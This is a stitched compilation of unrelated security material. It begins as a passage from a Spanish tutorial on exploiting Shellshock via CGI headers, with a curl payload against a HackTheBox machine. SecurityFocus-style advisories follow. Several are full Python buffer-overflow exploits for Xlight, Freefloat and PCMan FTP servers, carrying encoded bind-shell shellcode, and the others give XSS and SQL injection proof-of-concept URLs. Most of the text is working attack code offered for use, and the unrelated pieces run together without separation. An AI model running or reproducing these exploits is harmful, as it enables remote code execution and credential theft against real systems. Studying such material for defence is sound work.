este entorno, ejecútame el comando que digo, en este caso, env, para poder ver las variables de entorno del entorno que acabo de crear con el primer env, que al ser un entorno limpio, solo estará la variable de entorno que yo he pasado como argumento». He añadido el parámetro –ignore-environment para simplemente explicar el concepto del entorno que crea env. Si no lo pusiéramos, simplemente en el nuevo entorno se heredaría todas las variables de entorno existentes en nuestra entorno actual. Ok, ahora estás así: Es normal, simplemente vuelve a leer el párrafo de arriba despacito y con buena letra. Ahora bien, sabiendo esto, es aquí donde entra en juego el bug del que hemos hablado al principio, Shellshock. Si nosotros definimos la siguiente función en una variable: mi_funcion='() { :;}; echo «ES VULNERABLE» ‘ No debería de pasar nada. Sin embargo, si probamos a definir esta función en una variable de una nueva shell de bash (nuevo proceso): bash -c » es lo mismo que colocar bash -c : En ambos le estamos diciendo que en la nueva instancia/subproceso, que simplemente no haga nada. Menciono esto porque el doble punto aparece en el payload característico de Shellshock y es solo por eso, establece un comando que simplemente no hace nada. Se ejecuta, a pesar de que solo estamos definiendo una variable de entorno. Esto ocurre porque la nueva shell (el nuevo proceso) ve una variable de entorno que empieza por () y obtiene el nombre de la variable para ejecutarla y definir la función en el entorno. Sin embargo, como ya se ha dicho, el bug hacía que se ejecutase lo que se pusiera después de la función. En un sistema no vulnerable, ejecutando el comando de la imagen de arriba, simplemente no pasará nada: Y todo esto que he explicado es el bug y la famosa vulnerabilidad. Puedes pensar, oye, no es para tanto, porque al final, es un simple OS command injection en Linux. Shellshock Remoto Lo turbio de esta vulnerabilidad es que se puede explotar remotamente, por ejemplo, en un servidor web, ocasionando un Remote Command Execution (RCE). Los archivos susceptibles a un ataque Shellshock son los que comúnmente pertenezcan a alguna de las siguientes extensiones: cgish Algunos servidores web, como por ejemplo apache, soportan lo que se llama Common Gateway Interface (CGI). Esta característica permite a programas externos, hacer uso de datos provenientes del servidor web. Esta funcionalidad se relaciona con la famosa carpeta cgi-bin que nos podemos encontrar muchas veces. Cgi-bin es una carpeta creada automáticamente para colocar scripts que queramos que interactúen con el servidor web. Por lo que la explotación remota no se limita a los archivos .cgi. Se limita, a los archivos que interactúen con la bash usando en variables de entorno, datos del servidor web. Que es lo que permite el CGI. Entonces, la idea de la explotación remota es que cualquier información recibida en una petición por parte del cliente como puede ser el User-Agent, Referer, u otros parámetros se almacenan en forma de variables de entorno para que puedan ser usadas por programas o scripts externos, por esto, los archivos situados en la carpeta cgi-bin son susceptibles a Shellshock. Por curiosidad, las variables de entorno tendrán de nombre estilo: HTTP_<cabecera>. Por ejemplo, HTTP_USER_AGENT sería la variable de entorno que almacenaría el valor del User-Agent. Estas variables de entorno, al tratarse al fin y al cabo de cabeceras cuyo valor podemos editar, pues lo tenemos todo. Por un lado, tenemos variables de entorno las cuales podemos controlar su contenido, y, por otro lado, tenemos la ejecución en bash de scripts que hacen uso de las variables de entorno que nosotros controlamos. Si nosotros alterásemos el valor del User-Agent y lo sustituyéramos con un payload como el que hemos visto previamente. Estaría ocurriendo todo lo que hemos explicado. Una función definida en una variable de entorno, al pasarla al contexto de un nuevo entorno de un proceso de bash, ejecutará cualquier comando que se le ponga después de la declaración de la función. Ejemplo de Explotación Remota Vamos a ver como sería la explotación usando la máquina «Shocker» de HackTheBox. Lo primero de todo es identificar el archivo que puede ser vulnerable, en este caso, es user.sh: Una vez identificado es tan sencillo como enviar el payload característico de shellshock a través de alguna cabecera, por ejemplo, el User-Agent: curl -H ‘User-Agent: () { :;}; echo; echo ¿Es vulnerable?’ ‘http://10.10.10.56/cgi-bin/user.sh’ También podemos comprobar con otra cabecera, por ejemplo, el Referer: Podemos observar que en ambos casos se nos ha ejecutado la cadena del segundo echo. De esta forma, acabamos de verificar que es vulnerable. Por lo que ya prácticamente tenemos RCE, si queremos confirmarlo aún más, podemos probar a mandarnos paquetes ICMP: Aquí hay varios detalles a comentar. Lo primero es que colocamos un echo después de la declaración de la función para que el segundo comando pueda mostrar su salida en la respuesta HTTP. Aun así, si no lo pusiéramos, aunque no veamos la salida del comando en la respuesta, lo estaríamos ejecutando. Lo segundo es que, si nos fijamos estamos llamando a la bash de forma absoluta. Y esto es porque la variable $PATH está vacía en el entorno donde shellshock ejecuta el comando. También podríamos mandarnos una reverse shell: La explotación de esta vulnerabilidad realmente es tan sencillo como esto, colocar el payload clásico y boom, RCE. Referencias Understanding the Shellshock VulnerabilityHTB: ShockerThe ShellShock AttackHow to run a program in a clean environment in bash?Exploiting CGI Scripts with ShellshockBash – Functions in Shell Variables

source: https://www.securityfocus.com/bid/49255/info Xlight FTP Serveris prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. Xlight FTP Server 3.7.0 is vulnerable; other versions may also be affected. #!/usr/bin/python from socket import * import sys, struct, os, time print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit" if (len(sys.argv) < 3): print "\nXlightFTP Server v3.7.0 Remote Root BOF Exploit" print "\n Usage: %s <host> <port> \n" %(sys.argv[0]) sys.exit() print "\n[!] Connecting to %s ..." %(sys.argv[1]) # connect to host sock = socket(AF_INET,SOCK_STREAM) sock.connect((sys.argv[1],int(sys.argv[2]))) sock.recv(1024) time.sleep(5) #------------------------------------------- buffer = "\x41" * 1337 # Junk buffer += "\x90" * 123 # padding #------------------------------------------- # windows/shell_bind_tcp - 368 bytes # Encoder: x86/shikata_ga_nai (http://www.metasploit.com) # LPORT=4444, RHOST=192.168.1.2, EXITFUNC=process buffer += ("\x33\xc9\xbf\xb8\xf7\xfd\xd9\xda\xd8\xd9\x74\x24\xf4\xb1"+ "\x56\x5d\x83\xc5\x04\x31\x7d\x0d\x03\x7d\xb5\x15\x08\x25"+ "\x2d\x50\xf3\xd6\xad\x03\x7d\x33\x9c\x11\x19\x37\x8c\xa5"+ "\x69\x15\x3c\x4d\x3f\x8e\xb7\x23\xe8\xa1\x70\x89\xce\x8c"+ "\x81\x3f\xcf\x43\x41\x21\xb3\x99\x95\x81\x8a\x51\xe8\xc0"+ "\xcb\x8c\x02\x90\x84\xdb\xb0\x05\xa0\x9e\x08\x27\x66\x95"+ "\x30\x5f\x03\x6a\xc4\xd5\x0a\xbb\x74\x61\x44\x23\xff\x2d"+ "\x75\x52\x2c\x2e\x49\x1d\x59\x85\x39\x9c\x8b\xd7\xc2\xae"+ "\xf3\xb4\xfc\x1e\xfe\xc5\x39\x98\xe0\xb3\x31\xda\x9d\xc3"+ "\x81\xa0\x79\x41\x14\x02\x0a\xf1\xfc\xb2\xdf\x64\x76\xb8"+ "\x94\xe3\xd0\xdd\x2b\x27\x6b\xd9\xa0\xc6\xbc\x6b\xf2\xec"+ "\x18\x37\xa1\x8d\x39\x9d\x04\xb1\x5a\x79\xf9\x17\x10\x68"+ "\xee\x2e\x7b\xe5\xc3\x1c\x84\xf5\x4b\x16\xf7\xc7\xd4\x8c"+ "\x9f\x6b\x9d\x0a\x67\x8b\xb4\xeb\xf7\x72\x36\x0c\xd1\xb0"+ "\x62\x5c\x49\x10\x0a\x37\x89\x9d\xdf\x98\xd9\x31\x8f\x58"+ "\x8a\xf1\x7f\x31\xc0\xfd\xa0\x21\xeb\xd7\xd7\x65\x25\x03"+ "\xb4\x01\x44\xb3\x2b\x8e\xc1\x55\x21\x3e\x84\xce\xdd\xfc"+ "\xf3\xc6\x7a\xfe\xd1\x7a\xd3\x68\x6d\x95\xe3\x97\x6e\xb3"+ "\x40\x3b\xc6\x54\x12\x57\xd3\x45\x25\x72\x73\x0f\x1e\x15"+ "\x09\x61\xed\x87\x0e\xa8\x85\x24\x9c\x37\x55\x22\xbd\xef"+ "\x02\x63\x73\xe6\xc6\x99\x2a\x50\xf4\x63\xaa\x9b\xbc\xbf"+ "\x0f\x25\x3d\x4d\x2b\x01\x2d\x8b\xb4\x0d\x19\x43\xe3\xdb"+ "\xf7\x25\x5d\xaa\xa1\xff\x32\x64\x25\x79\x79\xb7\x33\x86"+ "\x54\x41\xdb\x37\x01\x14\xe4\xf8\xc5\x90\x9d\xe4\x75\x5e"+ "\x74\xad\x86\x15\xd4\x84\x0e\xf0\x8d\x94\x52\x03\x78\xda"+ "\x6a\x80\x88\xa3\x88\x98\xf9\xa6\xd5\x1e\x12\xdb\x46\xcb"+ "\x14\x48\x66\xde") #------------------------------------- buffer += "\x90" * 8 # more nop's #------------------------------------- buffer += "\x07\xd5\xc5\x7c" # jmp esp in shell32.dll (Windows XP SP3 - Universal) buffer += "\x0a" # end connection # send buffer print "[*] Sending Buffer Junk..." time.sleep(2) print "[*] Spawn a Backshell Connecting..." sock.send(buffer) sock.recv(1024) sock.close() print "[+] Exploit succeed. Now NetCat %s on port 4444\n" %(sys.argv[1]) print "\n > Exploit By : KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team" sys.exit()

source: https://www.securityfocus.com/bid/49257/info OneFileCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. OneFileCMS 1.1.1 is vulnerable; other versions may also be affected. http://www.example.com/onefilecms/onefilecms.php?p='"><marquee><h1>XSS Vulnerability<script>alert(String.fromCharCode(88,83,83))</script></h1></marquee>

source: https://www.securityfocus.com/bid/49265/info Freefloat FTP Server is prone to a buffer-overflow vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. import socket import sys def usage(): print "usage : ./freefloatftp.py <victim_ip> <victim_port>" print "example: ./freefloatftp.py 192.168.1.100 21" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "\n" print "#############################################################################" print "# Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit #" print "#############################################################################" print "\n" if len(sys.argv) != 3: usage() sys.exit() ip = sys.argv[1] port = sys.argv[2] junk1= "\x41" * 246 ret = "\xED\x1E\x94\x7C" #7C941EED JMP ESP nop = "\x90"* 200 # windows/exec CMD=calc.exe shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" "\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e" "\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69" "\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42" "\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52" "\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77" "\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70" "\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f" "\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36" "\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75" "\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55" "\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44" "\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f" "\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74" "\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b" "\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a" "\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f" "\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78" "\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d" "\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64" "\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c" "\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f" "\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a" "\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38" "\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c" "\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67" "\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e" "\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30" "\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d" "\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38" "\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62" "\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d" "\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45" "\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41") buff = junk1 + ret + nop + shellcode try: print("[-] Connecting to " + ip + " on port " + port + "\n") s.connect((ip,int(port))) data = s.recv(1024) print("[-] Sending exploit...") s.send("USER test\r\n") s.recv(1024) s.send("PASS test\r\n") s.recv(1024) s.send("ALLO "+buff+"\r\n") s.close() print("[-] Exploit successfully sent...") except: print("[-] Connection error...") print("[-] Check if victim is up.")

source: https://www.securityfocus.com/bid/49263/info TotalShopUK is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. TotalShopUK 1.7.2 is vulnerable; other versions may also be affected. http://www.example.com/products/c/index.php/1'

source: https://www.securityfocus.com/bid/49261/info Pandora FMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Pandora FMS 3.2.1 is vulnerable; other versions may also be affected. http://www.example.com/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=12&offset=0&search=bob%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

source: https://www.securityfocus.com/bid/49276/info Concrete is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Concrete 5.4.1.1 is vulnerable; other versions may also be affected. <form action="http://www.example.com/Concrete/index.php/login/do_login/" method="post"> <input type="hidden" name="uName" value="test" /> <input type="hidden" name="uPassword" value="test" /> <input type="hidden" name="rcID" value=&#039;" style=display:block;color:red;width:9999;height:9999;z-index:9999;top:0;left:0;background-image:url(javascript:alert(/XSS/));width:expression(alert(/XSS/)); onmouseover="alert(/XSS/)&#039; /> <input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1 XSS" /> </form>

# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command # Date : 12/02/2015 # Author: R-73eN # Software: PCMan FTP Server v2.0.7 # Tested On Windows Xp SP3 import socket #348 Bytes Bind Shell Port TCP/4444 shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9" shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46" shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84" shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8" shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08" shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27" shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24" shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80" shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98" shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7" shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0" shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82" shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0" shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6" shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d" shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32" shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90" shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5" shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71" shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2" shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f" shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14" shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec" shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88" shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79" banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server = raw_input('Enter IP : ') s.connect((server, 21)) a = s.recv(1024) print ' [+] ' + a s.send('User anonymous') s.recv(1024) s.send('pass') s.recv(1024) print ' [+] Logged in as Anonymous ...' evil = 'A' * 2007 #JUNK evil += '\x65\x82\xA5\x7C' # EIP overwrite jmp esp / shell32.dll evil += '\x90' * 10 evil += shellcode print ' [+] Sending Payload ...' s.send('mkd ' + evil) print ' [+] You got shell .....\n telnet ' + server + ' 4444'

source: https://www.securityfocus.com/bid/49296/info Real Estate Script is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. "/></a></><img src=1.gif onerror=alert(1)>

source: https://www.securityfocus.com/bid/49292/info Open Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Open Classifieds 1.7.2 is vulnerable; other versions may also be affected. http://www.example.com/oc172/?s="+onmouseover=alert(408852135615)+

source: https://www.securityfocus.com/bid/49297/info Hotel Portal is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. http://www.example.com/city.php?hotel_city=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&dayfrom=23&monthfrom=8&yearfrom=2011&dayback=24&monthback=8&yearback=2011&guest=1&rooms=1&hotel_stars=&pricefrom=0&pricetill=250&B1=Search

source: https://www.securityfocus.com/bid/49304/info VicBlog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/vicblog/index.php?page=posts&tag=1%27